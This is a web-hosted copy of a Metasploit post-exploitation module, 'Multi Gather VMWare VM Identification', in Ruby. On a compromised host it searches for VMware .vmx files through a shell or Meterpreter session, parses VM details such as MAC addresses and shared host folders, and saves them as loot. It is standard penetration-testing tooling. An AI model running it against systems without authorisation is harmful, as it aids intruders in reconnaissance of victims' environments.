CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/multi/gather/find_vmx.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'yaml'

7


8
class MetasploitModule < Msf::Post

9
  include Msf::Post::File

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Multi Gather VMWare VM Identification',

16
        'Description' => %q{

17
          This module will attempt to find any VMWare virtual machines stored on the target.

18
        },

19
        'License' => MSF_LICENSE,

20
        'Author' => ['theLightCosine'],

21
        'Platform' => %w[bsd linux osx unix win],

22
        'SessionTypes' => ['shell', 'meterpreter' ],

23
        'Compat' => {

24
          'Meterpreter' => {

25
            'Commands' => %w[

26
              core_channel_eof

27
              core_channel_open

28
              core_channel_read

29
              core_channel_write

30
              stdapi_fs_search

31
            ]

32
          }

33
        }

34
      )

35
    )

36
  end

37


38
  def run

39
    if session_has_search_ext

40
      vms = meterp_search

41
    elsif session.platform =~ /unix|linux|bsd|osx/

42
      vms = nix_shell_search

43
    end

44
    report_vms(vms) if vms

45
  end

46


47
  def report_vms(vms)

48
    output = "VMWare Virtual Machines\n"

49
    output << "--------------------------------\n"

50
    vms.each do |vm|

51
      next if vm.empty?

52


53
      output << "Name: #{vm['name']}\n"

54
      output << "Virtual CPUs: #{vm['cpus']}\n"

55
      output << "Memory: #{vm['memsize']}\n"

56
      output << "Operating System: #{vm['os']}\n"

57
      output << "Network Type: #{vm['eth_type']}\n"

58
      output << "MAC Address: #{vm['mac']}\n"

59
      output << "Shared Folders:\n"

60
      vm['SharedFolders'].each do |folder|

61
        output << "\tHost Location: #{folder}\n"

62
      end

63
      output << "\n"

64
    end

65
    print_good output

66
    store_loot('vmware_vms', 'text/plain', session, output, 'vmware_vms.txt', 'VMWare Virtual Machines')

67
  end

68


69
  def nix_shell_search

70
    vms = []

71
    res = session.shell_command('find / -name "*.vmx" -type f -print 2>/dev/null')

72
    res.each_line do |filename|

73
      next unless filename.start_with? '/'

74


75
      begin

76
        parse = session.shell_command("cat #{filename}")

77
        vms << parse_vmx(parse, filename)

78
      rescue StandardError

79
        print_error "Could not read #{filename} properly"

80
      end

81
    end

82
    return vms

83
  end

84


85
  def meterp_search

86
    vms = []

87
    res = session.fs.file.search(nil, '*.vmx', true, -1)

88
    res.each do |vmx|

89
      filename = "#{vmx['path']}\\#{vmx['name']}"

90
      next if filename.end_with? '.vmxf'

91


92
      begin

93
        config = client.fs.file.new(filename, 'r')

94
        parse = config.read

95
        vms << parse_vmx(parse, filename)

96
      rescue StandardError

97
        print_error "Could not read #{filename} properly"

98
      end

99
    end

100
    return vms

101
  end

102


103
  def parse_vmx(vmx_data, filename)

104
    vm = {}

105
    unless vmx_data.nil? || vmx_data.empty?

106
      vm['SharedFolders'] = []

107
      vmx_data.each_line do |line|

108
        data = line.split('=')

109
        vm['path'] = filename

110
        case data[0]

111
        when 'memsize '

112
          vm['memsize'] = data[1].gsub!('"', '').lstrip.chomp

113
        when 'displayName '

114
          vm['name'] = data[1].gsub!('"', '').lstrip.chomp

115
        when 'guestOS '

116
          vm['os'] = data[1].gsub!('"', '').lstrip.chomp

117
        when 'ethernet0.connectionType '

118
          vm['eth_type'] = data[1].gsub!('"', '').lstrip.chomp

119
        when 'ethernet0.generatedAddress '

120
          vm['mac'] = data[1].gsub!('"', '').lstrip.chomp

121
        when 'numvcpus '

122
          vm['cpus'] = data[1].gsub!('"', '').lstrip.chomp

123
        when 'sharedFolder0.hostPath '

124
          vm['SharedFolders'] << data[1].gsub!('"', '').lstrip.chomp

125
        end

126
      end

127
      vm['cpus'] ||= '1'

128
    end

129
    return vm

130
  end

131


132
  def session_has_search_ext

133
    return !!(session.fs and session.fs.file)

134
  rescue NoMethodError

135
    return false

136
  end

137


138
end

139


140